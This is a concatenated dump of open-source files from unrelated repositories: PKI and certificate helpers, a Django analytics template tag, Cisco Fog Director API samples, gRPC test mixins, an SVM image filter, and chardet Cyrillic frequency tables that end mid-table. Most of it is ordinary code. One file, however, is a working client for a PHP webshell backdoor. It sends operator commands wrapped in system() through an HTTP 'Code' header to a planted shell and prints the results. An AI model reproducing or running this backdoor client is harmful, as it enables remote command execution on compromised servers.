rv = False
elif not config.get(section,option) and option != 'ou':
rv = False
return rv
# ------------------------------------------------------------------------------
def check_permissions(file):
if path.isfile(file) \
and oct(os.stat(file)[stat.ST_MODE] & 0777) in ('0400','0600'):
rv = True
else:
rv = False
return rv
# ------------------------------------------------------------------------------
def is_private_key(file):
if path.isfile(file):
exp = re.compile('BEGIN RSA PRIVATE KEY', re.MULTILINE)
result = exp.search(open(file).read())
if result:
rv = True
else:
rv = False
else:
rv = False
return rv
# ------------------------------------------------------------------------------
def is_encrypted(file):
if path.isfile(file):
exp = re.compile('^Proc-Type: 4,ENCRYPTED', re.MULTILINE)
result = exp.search(open(file).read())
if result:
rv = True
else:
rv = False
else:
rv = False
return rv
# ------------------------------------------------------------------------------
def strip_invalid(cn):
    # Keep only [a-z0-9._-]: build the set of characters to delete and hand
    # it to the two-argument (table, deletechars) form of str.translate.
    all = ''.join(map(chr, range(256)))
    valid = string.lowercase + string.digits + '._-'
    invalid = ''.join(sets.Set(all).difference(valid))
    cn = cn.lower().translate(all, invalid)
    return cn
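# For example (hypothetical input): strip_invalid('My Server #1!') returns
# 'myserver1' - the name is lowercased and the space, '#' and '!' are deleted.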
# ------------------------------------------------------------------------------
def move_revoked(config, filelist, serial):
destDir = path.join(config.get('keys', 'path_revoked'), serial)
try:
os.makedirs(destDir, 0700)
for file in filelist:
dest = path.join(destDir, os.path.basename(file))
os.rename(file, dest)
except:
rv = False
else:
rv = True
return rv
# ------------------------------------------------------------------------------
def serial_from_cn(config, cn):
serial = None
keyDir = config.get('keys', 'path')
crtFile = path.join(keyDir, cn + '.crt')
if path.isfile(crtFile):
exp = re.compile('(^.*Serial Number:)(.*[0-9]+.*)(\(.*\)$)', re.MULTILINE)
result = exp.search(open(crtFile).read())
if result and len(result.groups()) == 3:
serial = hex(int(result.group(2).strip()))[2:].upper()
if len(serial) % 2:
serial = '0' + serial
return serial
# ------------------------------------------------------------------------------
def cert_type(config, serial, status):
if status == pki.CERT_VALID:
keyDir = config.get('keys', 'path')
pemFile = path.join(keyDir, serial + '.pem')
else:
revDir = config.get('keys', 'path_revoked')
pemFile = path.join(path.join(revDir, serial), serial + '.pem')
if path.isfile(pemFile):
exp = re.compile('.*SSL Server$', re.MULTILINE)
result = exp.search(open(pemFile).read())
if result:
rv = pki.CERT_SERVER
else:
rv = pki.CERT_CLIENT
else:
rv = None
return rv
# ------------------------------------------------------------------------------
def cert_files(config, cn, serial, download = False):
keyDir = config.get('keys', 'path')
files = []
rv = None
if serial:
if download:
files.append(path.join(keyDir, cn + '.crt'))
files.append(path.join(keyDir, cn + '.key'))
files.append(path.join(keyDir, config.get('ca', 'name') + '.crt'))
if cert_type(config, serial, pki.CERT_VALID) == pki.CERT_SERVER:
keySize = config.get('keys', 'size')
files.append(path.join(keyDir, 'dh' + keySize + '.pem'))
else:
files.append(path.join(keyDir, cn + '.csr'))
files.append(path.join(keyDir, cn + '.crt'))
files.append(path.join(keyDir, cn + '.key'))
files.append(path.join(keyDir, serial + '.pem'))
for file in files:
if not path.isfile(file):
break
else:
rv = files
return rv
# ------------------------------------------------------------------------------
def create_ssl_script(config, cn = ''):
try:
fd, fname = tempfile.mkstemp()
os.write(fd, """#!/bin/bash
export KEY_DIR="%(dir)s"
export KEY_CN="%(cn)s"
export KEY_SIZE="%(size)s"
export KEY_EXPIRE="%(expire)s"
export KEY_COUNTRY="%(country)s"
export KEY_PROVINCE="%(province)s"
export KEY_CITY="%(city)s"
export KEY_ORG="%(org)s"
export KEY_OU="%(ou)s"
export KEY_EMAIL="%(email)s"
""" % { 'dir' : config.get('keys', 'path'),
'cn' : cn,
'size' : config.get('keys', 'size'),
'expire' : config.get('keys', 'expire'),
'country' : config.get('keys', 'country'),
'province' : config.get('keys', 'province'),
'city' : config.get('keys', 'city'),
'org' : config.get('keys', 'org'),
'ou' : config.get('keys', 'ou'),
'email' : config.get('keys', 'email')
})
except:
fd = None
fname = None
return fd, fname
# ------------------------------------------------------------------------------
def run_ssl_script(script):
os.chmod(script, 0700)
status, output = commands.getstatusoutput(script)
os.remove(script)
return not status, output
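# Rough end-to-end sketch (needs a readable /etc/vinty/vinty.cfg; the CN is
# hypothetical). The generated script only exports KEY_* variables, so
# running it here is side-effect free:
if __name__ == '__main__':
    config = parse_config()
    if config is not None:
        fd, script = create_ssl_script(config, cn='vpn-client-01')
        if fd is not None:
            os.close(fd)
            ok, output = run_ssl_script(script)
            print 'ok:', ok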
| gpl-2.0 |
clintecker/django-google-analytics | google_analytics/templatetags/analytics.py | 3 | 2204 | from django import template
from django.conf import settings
from django.db import models
from django.contrib.sites.models import Site
from django.template import Context, loader
register = template.Library()
Analytics = models.get_model('googleanalytics', 'analytics')
def do_get_analytics(parser, token):
contents = token.split_contents()
tag_name = contents[0]
template_name = 'google_analytics/%s_template.html' % tag_name
if len(contents) == 2:
# split_contents() knows not to split quoted strings.
code = contents[1]
elif len(contents) == 1:
code = None
else:
raise template.TemplateSyntaxError, "%r cannot take more than one argument" % tag_name
if not code:
current_site = Site.objects.get_current()
else:
if not (code[0] == code[-1] and code[0] in ('"', "'")):
raise template.TemplateSyntaxError, "%r tag's argument should be in quotes" % tag_name
code = code[1:-1]
current_site = None
return AnalyticsNode(current_site, code, template_name)
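# Typical template usage (tracking ids below are hypothetical):
#     {% load analytics %}
#     {% analytics %}               {# code resolved from the current Site #}
#     {% analytics "UA-12345-6" %}  {# explicit tracking code #}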
class AnalyticsNode(template.Node):
def __init__(self, site=None, code=None, template_name='google_analytics/analytics_template.html'):
self.site = site
self.code = code
self.template_name = template_name
def render(self, context):
content = ''
if self.site:
code_set = self.site.analytics_set.all()
if code_set:
code = code_set[0].analytics_code
else:
return ''
elif self.code:
code = self.code
else:
return ''
if code.strip() != '':
t = loader.get_template(self.template_name)
c = Context({
'analytics_code': code,
'track_page_load_time': getattr(settings,
"GOOGLE_ANALYTICS_TRACK_PAGE_LOAD_TIME",
False),
})
return t.render(c)
else:
return ''
register.tag('analytics', do_get_analytics)
register.tag('analytics_async', do_get_analytics)
| mit |
DevOps4Networks/iox-utils | fog-director-utils/src/iox_fog_dir_rest/functions.py | 1 | 2610 | #! /usr/bin/env python
# encoding: utf-8
"""
Copyright 2016 Nathan John Sowatskey
These are sample functions for the Cisco Fog Director REST API.
See:
http://www.cisco.com/c/en/us/td/docs/routers/access/800/software/guides/iox/fog-director/reference-guide/1-0/fog_director_ref_guide.html
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import requests
import settings
import logging
from logging.config import fileConfig
fileConfig('../etc/logging_config.ini')
logger = logging.getLogger()
def get_token():
response = requests.post(settings.url_base + 'tokenservice',
auth=(settings.user_name, settings.password),
verify=False)
if response.status_code == 202:
return response.json()['token']
else:
logger.error("Response code was - " + response.status_code + " in get_token()")
return None
def get_devices(limit=10, offset=0):
#The limit default seems to be 10
token = get_token()
headers = {'x-token-id':token}
function_part = "devices" + '?limit=' + str(limit) +'&offset=' + str(offset)
response = requests.get(settings.url_base + function_part, headers=headers,
verify=settings.verify)
token = ""
if response.status_code == 200:
return response.json()
else:
logger.error("Response code was - " + str(response.status_code) + " in get_devices()")
return None
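# Example round trip (the response shape and the device id field below are
# assumptions, not confirmed against the Fog Director API reference):
#     devices = get_devices(limit=50)
#     if devices and devices.get('data'):
#         delete_device(devices['data'][0]['deviceId'])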
def delete_device(deviceId):
token = get_token()
headers = {'x-token-id':token}
response = requests.delete(settings.url_base + 'devices/' + deviceId, headers=headers,
verify=settings.verify)
token = ""
return response.status_code
def add_devices_from_file(filename):
token = get_token()
headers = {'x-token-id':token}
files = {'file': open(filename, 'rb')}
response = requests.post(settings.url_base + 'devices/import', headers=headers, files=files,
verify=settings.verify)
token = ""
return response.status_code | apache-2.0 |
simonkuang/grpc | src/python/grpcio_tests/tests/interop/_intraop_test_case.py | 27 | 1865 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common code for unit tests of the interoperability test code."""
from tests.interop import methods
class IntraopTestCase(object):
"""Unit test methods.
This class must be mixed in with unittest.TestCase and a class that defines
setUp and tearDown methods that manage a stub attribute.
"""
def testEmptyUnary(self):
methods.TestCase.EMPTY_UNARY.test_interoperability(self.stub, None)
def testLargeUnary(self):
methods.TestCase.LARGE_UNARY.test_interoperability(self.stub, None)
def testServerStreaming(self):
methods.TestCase.SERVER_STREAMING.test_interoperability(self.stub, None)
def testClientStreaming(self):
methods.TestCase.CLIENT_STREAMING.test_interoperability(self.stub, None)
def testPingPong(self):
methods.TestCase.PING_PONG.test_interoperability(self.stub, None)
def testCancelAfterBegin(self):
methods.TestCase.CANCEL_AFTER_BEGIN.test_interoperability(
self.stub, None)
def testCancelAfterFirstResponse(self):
methods.TestCase.CANCEL_AFTER_FIRST_RESPONSE.test_interoperability(
self.stub, None)
def testTimeoutOnSleepingServer(self):
methods.TestCase.TIMEOUT_ON_SLEEPING_SERVER.test_interoperability(
self.stub, None)
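# A concrete test case might mix this in roughly as follows (the channel
# target and generated-stub names are hypothetical, not taken from this repo):
#     import unittest
#     import grpc
#     from src.proto.grpc.testing import test_pb2_grpc
#     class InsecureIntraopTest(IntraopTestCase, unittest.TestCase):
#         def setUp(self):
#             self.channel = grpc.insecure_channel('localhost:50052')
#             self.stub = test_pb2_grpc.TestServiceStub(self.channel)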
| apache-2.0 |
akamajoris/webshell | php/php-sh/client.py | 26 | 1279 | #!/usr/bin/python
# Client for the backdoor which
# uses HTTP CODE header for inserting code
# Got the idea after seeing this sort of payload
# dropped by a phpmyadmin exploit on rdot :)
# Is also good to learn how to use urllib
# and not be lazy arse with requests all of time!
# Insecurety Research (2013) - insecurety.net
import urllib2
import sys
def usage(program):
print "HTTP CODE Header Backdoor Command Shell"
print "Usage: %s <Backdoor URL>" %(program)
print "Example: %s http://www.test.com/webshell.php" %(program)
sys.exit(0)
def main(args):
try:
if len(args) < 2:
usage(args[0])
print "[+] Using %s as target" %(args[1])
print "[!] Popping a shell, type 'exit' to quit"
while True:
opener = urllib2.build_opener()
url = args[1]
cmd = raw_input('~$ ')
if cmd == "exit":
sys.exit(0)
else:
code = "system('%s');" %(cmd)
                opener.addheaders.append(('Code', code))
urllib2.install_opener(opener)
result = urllib2.urlopen(url).read()
print result
except Exception, e:
print e
if __name__ == "__main__":
main(sys.argv)
| gpl-3.0 |
vismantic-ohtuprojekti/qualipy | qualipy/filters/svm_filter.py | 2 | 2714 | import os.path
import numpy
from filter import Filter
from ..utils.svm import SVM
class SVMFilter(Filter):
"""An abstract class representing a filter that uses SVM"""
def __init__(self, threshold, invert_threshold, svm_file):
super(SVMFilter, self).__init__(threshold, invert_threshold)
if not (isinstance(svm_file, str) or
isinstance(svm_file, unicode)):
raise TypeError("svm_file should be a string")
self.svm = SVM()
self.load(svm_file)
def train(self, images, labels, save_path, read_image,
get_input_vector):
"""Train an SVM-based filter
:param images: list of file paths to images
:type images: list
:param labels: list of labels for the corresponding images, every
label should be either 0 or 1
:type labels: list
:param save_path: file path to save the resulting SVM model to,
None if not needed
:type save_path: str
:param read_image: function to use for reading the image from a path
:type read_image: function
:param get_input_vector: function to use for constructing the input
vector for a sample image
:type get_input_vector: function
"""
samples = []
for image in images:
img = read_image(image)
if img is None:
raise IOError("unable to read image: %s" % image)
samples.append(get_input_vector(img))
samples = numpy.array(samples, dtype=numpy.float32)
labels = numpy.array(labels, dtype=numpy.float32)
if len(samples) != len(labels):
raise ValueError("samples and labels should have same length")
try:
self.svm.train(samples, labels)
except:
raise ValueError("too few training samples")
if save_path is not None:
self.save(save_path)
def load(self, path):
"""Load an SVM model from a file.
:param path: path to the SVM data file
:type path: str
"""
if not (isinstance(path, str) or isinstance(path, unicode)):
raise TypeError("path should be a string")
if not os.path.isfile(path):
raise ValueError("invalid file path for SVM model")
self.svm.load(path)
def save(self, path):
"""Save the current SVM model to a file.
:param path: path to the destination file
:type path: str
"""
if not (isinstance(path, str) or isinstance(path, unicode)):
raise TypeError("path should be a string")
self.svm.save(path)
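# Rough sketch of a concrete subclass (names and feature extraction are
# hypothetical; SVMFilter only supplies the train/load/save plumbing):
#     class ExampleFilter(SVMFilter):
#         name = 'example'
#         def __init__(self, threshold=0.5, invert_threshold=False,
#                      svm_file='example.yml'):
#             super(ExampleFilter, self).__init__(threshold,
#                                                 invert_threshold, svm_file)
#         def retrain(self, images, labels, save_path):
#             self.train(images, labels, save_path,
#                        read_image=read_grayscale,
#                        get_input_vector=extract_features)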
| mit |
tuxfux-hlp-notes/python-batches | archieves/batch-59/files/myvenv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/langcyrillicmodel.py | 2762 | 17725 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# KOI8-R language model
# Character Mapping Table:
KOI8R_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, # 80
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, # 90
223,224,225, 68,226,227,228,229,230,231,232,233,234,235,236,237, # a0
238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253, # b0
27, 3, 21, 28, 13, 2, 39, 19, 26, 4, 23, 11, 8, 12, 5, 1, # c0
15, 16, 9, 7, 6, 14, 24, 10, 17, 18, 20, 25, 30, 29, 22, 54, # d0
59, 37, 44, 58, 41, 48, 53, 46, 55, 42, 60, 36, 49, 38, 31, 34, # e0
35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0
)
win1251_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246, 68,247,248,249,250,251,252,253,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
)
latin5_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
macCyrillic_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246,247,248,249,250,251,252, 68, 16,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255,
)
IBM855_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194, 68,195,196,197,198,199,200,201,202,203,204,205,
206,207,208,209,210,211,212,213,214,215,216,217, 27, 59, 54, 70,
3, 37, 21, 44, 28, 58, 13, 41, 2, 48, 39, 53, 19, 46,218,219,
220,221,222,223,224, 26, 55, 4, 42,225,226,227,228, 23, 60,229,
230,231,232,233,234,235, 11, 36,236,237,238,239,240,241,242,243,
8, 49, 12, 38, 5, 31, 1, 34, 15,244,245,246,247, 35, 16,248,
43, 9, 45, 7, 32, 6, 40, 14, 52, 24, 56, 10, 33, 17, 61,249,
250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255,
)
IBM866_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 97.6601%
# first 1024 sequences: 2.3389%
# rest sequences: 0.1237%
# negative sequences: 0.0009%
RussianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,2,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,2,3,3,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,2,3,1,3,3,1,3,3,3,3,2,2,3,0,2,2,2,3,3,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,3,3,2,2,3,2,3,3,3,2,1,2,2,0,1,2,2,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,0,2,2,3,3,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,1,2,3,2,2,3,2,3,3,3,3,2,2,3,0,3,2,2,3,1,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,3,3,3,3,2,2,2,0,3,3,3,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,2,3,2,2,0,1,3,2,1,2,2,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,1,1,3,0,1,1,1,1,2,1,1,0,2,2,2,1,2,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,2,2,2,2,1,3,2,3,2,3,2,1,2,2,0,1,1,2,1,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,2,3,3,3,2,2,2,2,0,2,2,2,2,3,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,2,3,2,2,3,3,3,3,3,3,3,3,3,1,3,2,0,0,3,3,3,3,2,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,2,3,3,0,2,1,0,3,2,3,2,3,0,0,1,2,0,0,1,0,1,2,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,3,0,2,3,3,3,3,2,3,3,3,3,1,2,2,0,0,2,3,2,2,2,3,2,3,2,2,3,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,0,2,3,2,3,0,1,2,3,3,2,0,2,3,0,0,2,3,2,2,0,1,3,1,3,2,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,0,2,3,3,3,3,3,3,3,3,2,1,3,2,0,0,2,2,3,3,3,2,3,3,0,2,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,2,2,2,3,3,0,0,1,1,1,1,1,2,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,3,3,3,3,3,0,3,2,3,3,2,3,2,0,2,1,0,1,1,0,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,2,2,2,2,3,1,3,2,3,1,1,2,1,0,2,2,2,2,1,3,1,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
2,2,3,3,3,3,3,1,2,2,1,3,1,0,3,0,0,3,0,0,0,1,1,0,1,2,1,0,0,0,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,2,1,1,3,3,3,2,2,1,2,2,3,1,1,2,0,0,2,2,1,3,0,0,2,1,1,2,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,3,3,1,2,2,2,1,2,1,3,3,1,1,2,1,2,1,2,2,0,2,0,0,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,1,3,2,2,3,2,0,3,2,0,3,0,1,0,1,1,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,3,3,3,2,2,2,3,3,1,2,1,2,1,0,1,0,1,1,0,1,0,0,2,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,1,1,2,1,2,3,3,2,2,1,2,2,3,0,2,1,0,0,2,2,3,2,1,2,2,2,2,2,3,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,1,1,0,1,1,2,2,1,1,3,0,0,1,3,1,1,1,0,0,0,1,0,1,1,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,3,3,3,2,0,0,0,2,1,0,1,0,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
